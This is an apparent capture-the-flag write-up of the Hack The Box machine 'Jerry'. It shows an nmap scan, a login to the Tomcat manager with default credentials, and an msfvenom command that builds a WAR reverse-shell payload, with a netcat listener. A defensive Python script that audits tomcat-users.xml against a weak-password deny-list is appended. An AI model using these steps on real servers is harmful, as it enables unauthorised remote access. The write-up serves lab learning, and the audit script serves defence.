# Jerry - HTB :mouse2:
> [name=El Famoso]
> [time=27 Dec 2023]
So it's a basic box challenge with only one service up: a Tomcat service.
```
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-28 06:09 CET
Nmap scan report for 10.129.136.9
Host is up (0.021s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
```
This nmap output is short, which is nice: we know where we should focus. Obviously there is a Tomcat service running on port 8080.
We can use the browser to access the web page.

We can try to access the Server Status, Manager App or Host Manager pages, which seem interesting.
I tried the `admin:admin` combination and it worked!
But for the Manager App I didn't have the right to access.

On the 403 page we see an error message that explains how to add a username to the manager-gui. I tried this example because people often follow tutorials without thinking of changing example passwords.
And it worked! I have access to the manager page!
From there we can upload a WAR file with a reverse shell to gain access to the machine.
Here is how I pack the payload:
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.121 LPORT=4444 -f war > sh3ll.war
nc -lvnp 4444  # on another terminal ofc
```

And we are root, so we can display the flags that are in the folder `C://Users/Administrator/Desktop`

What I learned:
* Reverse shells can be a pain in the ass
* The use of msfvenom / metasploit is cool, I will use it more often
* `more 2*`
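
For the defensive side of the two logins above (`admin:admin` and the example account copied from the error page), here is an added example, not part of the original write-up, that audits a `tomcat-users.xml` for guessable passwords on accounts that can deploy WAR files. The sample file and the deny-list are constructed; only the `admin` password comes from this page.

```python
import xml.etree.ElementTree as ET

# Roles that expose the manager's deploy functions (HTML and text interfaces).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Constructed deny-list: "admin" is the password seen in this write-up, the
# rest are placeholders for values copied from tutorials or error pages.
WEAK_PASSWORDS = {"admin", "tomcat", "password", "changeme"}

# Constructed sample file, not taken from the box in the write-up.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="admin-gui"/>
  <user username="deployer" password="changeme" roles="manager-gui,manager-script"/>
  <user username="ops" password="constructed-Xk7-long-random" roles="manager-gui"/>
</tomcat-users>"""


def local(tag):
    """Drop an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, weak=WEAK_PASSWORDS):
    """Return (username, severity, reason) for every guessable account."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local(elem.tag) != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        # Guessable: on the deny-list, empty, or identical to the username.
        if password and password.lower() not in weak and password.lower() != name.lower():
            continue
        if roles & DEPLOY_ROLES:
            findings.append((name, "critical", "guessable password, can deploy WAR files"))
        else:
            findings.append((name, "high", "guessable password"))
    return findings


if __name__ == "__main__":
    for name, severity, reason in audit_tomcat_users(SAMPLE):
        print(f"[{severity}] {name}: {reason}")
```

Passwords stored as digests will not match the plaintext deny-list, so this check covers plaintext entries only.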